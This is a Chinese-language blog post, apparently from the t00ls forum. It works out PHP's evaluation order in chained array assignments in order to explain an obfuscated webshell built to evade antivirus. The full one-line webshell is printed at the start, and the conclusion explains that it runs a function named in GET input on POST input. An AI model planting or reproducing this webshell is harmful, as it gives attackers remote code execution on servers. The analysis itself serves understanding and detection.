分析一个免杀webshell发现的php特性

文章首发于t00ls，嫌文章太啰嗦的可以直接看结论

起源

之前看到别人分享的一个免杀webshell：

<?php
@$GLOBALS{next} = $GLOBALS[$GLOBALS[func] = current($GLOBALS)[GLOBALS]] = $GLOBALS[$GLOBALS[code] = next($GLOBALS)[GLOBALS]] = $GLOBALS[$GLOBALS{func}($GLOBALS{code})];
?>

开始是百思不得其解，后来在测试过程中通过分解和删减语句渐渐的对这段代码的执行顺序产生了疑惑，所以就有了如下的简单试验

分析

假设赋值语句为：$a[x]=$b[y]=c我们都知道值传递是从右到左，那么当数组的索引也是表达式的多重赋值中，顺序是怎么样的呢，我给出了下面3种假设：
（1）
1.Y
2.$b[y]=c
3.X
4.$a[x]=$b[y]
（2）
1.Y
2.X
3.$b[y]=c
4.$a[x]=$b[y]
（3）
1.X
2.Y
3.$b[y]=c
4.$a[x]=$b[y]
为了查明正确的执行顺序，弄了个简单的实例：

<?php
$a = array(1,2,3);
$a[$a[0]=$a[1]+2] = $a[$a[1]=$a[2]-3] =  100;
var_dump($a);
?>

顺序（1）

$a[0] = 1，$a[1] = 2，$a[2] = 3
1.$a[1] = $a[2] - 3 = 0
数组：$a[0] = 1，$a[1] = 0，$a[2] = 3，表达式：$a[$a[0]=$a[1]+2] = $a[0] = 100
2.$a[0] = 100
数组：$a[0] = 100，$a[1] = 0，$a[2] = 3，表达式：$a[$a[0]=$a[1]+2] = $a[0]
3.$a[0] = $a[1] + 2 = 2
数组：$a[0] = 2，$a[1] = 0，$a[2] = 3，表达式：$a[2] = $a[0]
4.$a[2] = $a[0] = 2
结果：$a[0] = 2，$a[1] = 0，$a[2] = 2

顺序（2）

$a[0] = 1,$a[1] = 2,$a[2] = 3  
1.$a[1] = $a[2]-3 = 0
数组：$a[0] = 1,$a[1] = 0,$a[2] = 3  表达式：$a[$a[0]=$a[1]+2] = $a[0] = 100
2.$a[0] = $a[1] + 2 = 2
数组：$a[0] = 2,$a[1] = 0,$a[2] = 3        表达式：$a[2] = $a[0] = 100
3.$a[2] = $a[0] = 100
结果：$a[0] = 100,$a[1] = 0,$a[2] = 100

顺序（3）

$a[0] = 1,$a[1] = 2,$a[2] = 3
1.$a[0] = $a[1]+2 = 4
数组：$a[0] = 4,$a[1] = 2,$a[2] = 3  表达式：$a[4] = $a[$a[1]=$a[2]-3] = 100
2.$a[1] = $a[2] -3 = 0
数组：$a[0] = 4,$a[1] = 0,$a[2] = 3  表达式：$a[4] = $a[0] = 100
3.$a[4] = $a[0] = 100
结果：$a[0] = 100,$a[1] = 0,$a[2] = 3,$a[4] = 100

程序运行结果：

可以知道，执行的顺序应为3，即当$a[xx]=$b[***]=$c的时候，执行的顺序是
xx -> *** -> 从右到左依次赋值

结论

再回头看webshell，正确的执行顺序应该为：
1.$GLOBALS[func]=current($GLOBALS)[GLOBALS] （_GET中的内容赋值给$GLOBALS[func])
2.$GLOBALS[code]=next($GLOBALS)[GLOBALS] (_POST中的内容赋值给$GLOBALS[code])
3.$GLOBALS{func}($GLOBALS{code});  (变量函数中传入变量）
其他的赋值语句都是混淆